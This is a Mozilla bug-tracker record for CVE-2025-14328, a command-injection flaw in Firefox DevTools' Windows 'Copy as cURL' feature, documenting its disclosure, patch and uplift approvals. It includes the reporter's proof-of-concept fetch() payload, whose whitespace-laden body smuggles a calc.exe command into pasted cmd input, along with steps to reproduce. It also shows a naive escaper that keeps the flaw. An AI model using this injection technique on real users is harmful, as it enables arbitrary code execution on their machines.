Closed Bug 1996761 (CVE-2025-14328) Opened 7 months ago Closed 7 months ago

Copy As Curl (Windows) - Code Execution via body \n injection

Categories

(DevTools :: Netmonitor, defect, P2)

Unspecified
Windows
defect

Tracking

(firefox-esr115 wontfix, firefox-esr140 146+ fixed, firefox145 wontfix, firefox146+ fixed, firefox147+ fixed)

RESOLVED FIXED
147 Branch

People

(Reporter: ameenbasha111, Assigned: bomsy)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-priv-escalation, reporter-external, sec-moderate, Whiteboard: [client-bounty-form][adv-main146+][adv-esr140.6+])

Attachments

(3 files)

Hi Team, the latest Firefox on Windows is vulnerable to code execution via the Copy as cURL (Windows) feature, which allows an attacker to execute an arbitrary command on the victim's machine.

Payload:

fetch("/", {
  "credentials": "omit",
  "headers": {
    "Accept-Language": "en-US",
    "Content-Type": "text/plain",
  },
  "body": '\t \rcalc.exe "\t  \n',
  "method": "POST",
});

Note: It also has the impact of sharing the LOCAL FILE NAME with the attacker by using consecutive tab characters.

Steps to reproduce:

  1. Send the above request directly via the console (or) embed it in HTML
  2. Now, from the Network tab, copy the request as cURL
  3. Paste it in cmd and you will see the calc popup

Tested in Nightly 146.0a1 (2025-10-27) (64-bit) on windows 11 pro

I have attached the PoC video too for reference.

Flags: sec-bounty?

Root cause: when " is used it is escaped with the ^ character, so " becomes ^", and the immediate usage of \t includes the local file name, which will be enclosed with "; we are then free to use \n (or) \r to break to a new line and execute code.

  1. Impact: Code Execution
  2. Local File Names Disclosure (complete directory file name disclosure to the attacker)
Component: Security → Netmonitor
Product: Firefox → DevTools
Status: UNCONFIRMED → NEW
Ever confirmed: true
OS: Unspecified → Windows
See Also: → CVE-2025-14329
Blocks: curl
Summary: Copy As Curl[Windows] - Code Execution [Latest] → Copy As Curl (Windows) - Code Execution via body \n injection
Severity: -- → S3
Priority: -- → P2
Attached file (secure)
Assignee: nobody → hmanilla
Status: NEW → ASSIGNED
Pushed by hmanilla@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/5c7b1adb9c3f https://hg.mozilla.org/integration/autoland/rev/fc7eb99824bb [devtools] Replace any other whitespace like characters with space r=devtools-reviewers,nchevobbe
Group: firefox-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 7 months ago
Flags: in-testsuite+
Resolution: --- → FIXED
Target Milestone: --- → 147 Branch

The patch landed in nightly and beta is affected.
:bomsy, is this bug important enough to require an uplift?

For more information, please visit BugBot documentation.

Flags: needinfo?(hmanilla)

:bomsy, to add to Comment 5, this will also need an uplift request for ESR140. It grafts cleanly with Bug 1997018 applied.

Flags: sec-bounty? → sec-bounty+

firefox-esr140 Uplift Approval Request

  • User impact if declined: With clever combinations that include certain whitespace-like characters in the curl commands, apps on the user's local machine can be executed.
  • Code covered by automated testing: yes
  • Fix verified in Nightly: yes
  • Needs manual QE test: no
  • Steps to reproduce for manual QE testing:
  • Risk associated with taking this patch: low
  • Explanation of risk level: Small JS patch with a regexp to escape the whitespace-like characters.
  • String changes made/needed: None
  • Is Android affected?: no
Attachment #9529372 - Flags: approval-mozilla-esr140?
Attached file (secure)

Certain control characters (e.g. tab or form feed) are whitespace-like characters.
This replaces those with a simple space.

Original Revision: https://phabricator.services.mozilla.com/D272425

Flags: needinfo?(hmanilla)
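The escaping failure described in the root-cause comment and the whitespace normalisation described in the patch summary, as an added JavaScript example (hypothetical code, not Firefox's escapeStringWin or the landed patch): escapeForCmdNaive models the behaviour the reporter describes, escapeForCmd flattens whitespace-like control characters to a space before quoting, and isSingleLine is the output check a generator can apply. The control-character set and the doubled-quote convention are assumptions.

```javascript
// Added example, not Firefox's code: a minimal model of the cmd.exe argument
// escaping bug in this report and of the fix's "replace whitespace-like
// characters with a space" approach.

// Constructed sample: the body from the report's fetch() payload.
const REPORTED_BODY = '\t \rcalc.exe "\t  \n';

// Naive escaper modelling the root-cause comment: wrap in double quotes and
// turn embedded quotes into ^". Control characters pass through, so a \r or \n
// inside the argument ends the command line early and what follows is parsed
// as a new command.
function escapeForCmdNaive(str) {
  return '"' + str.replace(/"/g, '^"') + '"';
}

// Whitespace-like control characters (assumed set): tab, line feed,
// vertical tab, form feed, carriage return.
const WHITESPACE_LIKE = /[\t\n\v\f\r]/g;

// Hardened escaper: flatten every whitespace-like character to a plain space
// first, then double embedded quotes (the convention the Microsoft CRT
// argument parser accepts for a literal quote inside a quoted argument)
// and wrap the result in double quotes.
function escapeForCmd(str) {
  const flat = str.replace(WHITESPACE_LIKE, " ");
  return '"' + flat.replace(/"/g, '""') + '"';
}

// Output check a copy-as-cURL generator can run before writing to the
// clipboard: one argument must never span more than one line of cmd input.
function isSingleLine(arg) {
  return !/[\r\n]/.test(arg);
}

// Builds the --data-raw part of a Windows curl command with the chosen escaper.
function buildDataArg(body, escaper) {
  return "--data-raw " + escaper(body);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("naive:", JSON.stringify(buildDataArg(REPORTED_BODY, escapeForCmdNaive)));
  console.log("fixed:", JSON.stringify(buildDataArg(REPORTED_BODY, escapeForCmd)));
}
```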

Comment on attachment 9526438 [details]
(secure)

Beta/Release Uplift Approval Request

  • User impact if declined/Reason for urgency: With clever combinations that include certain whitespace-like characters in the curl commands, apps on the user's local machine can be executed.
  • Is this code covered by automated tests?: Yes
  • Has the fix been verified in Nightly?: Yes
  • Needs manual test from QE?: No
  • If yes, steps to reproduce:
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Small JS patch with a regexp to escape the whitespace-like characters.
  • String changes made/needed: None
  • Is Android affected?: No
Attachment #9526438 - Flags: approval-mozilla-beta?
Attachment #9529372 - Flags: approval-mozilla-beta?

Comment on attachment 9526438 [details]
(secure)

Approved for 146.0b9

Attachment #9526438 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #9529372 - Flags: approval-mozilla-esr140? → approval-mozilla-esr140+
QA Whiteboard: [sec] [uplift] [qa-triage-done-c147/b146]
Whiteboard: [client-bounty-form] → [client-bounty-form][adv-main146+]
Whiteboard: [client-bounty-form][adv-main146+] → [client-bounty-form][adv-main146+][adv-esr140.6+]
Alias: CVE-2025-14328
Group: core-security-release
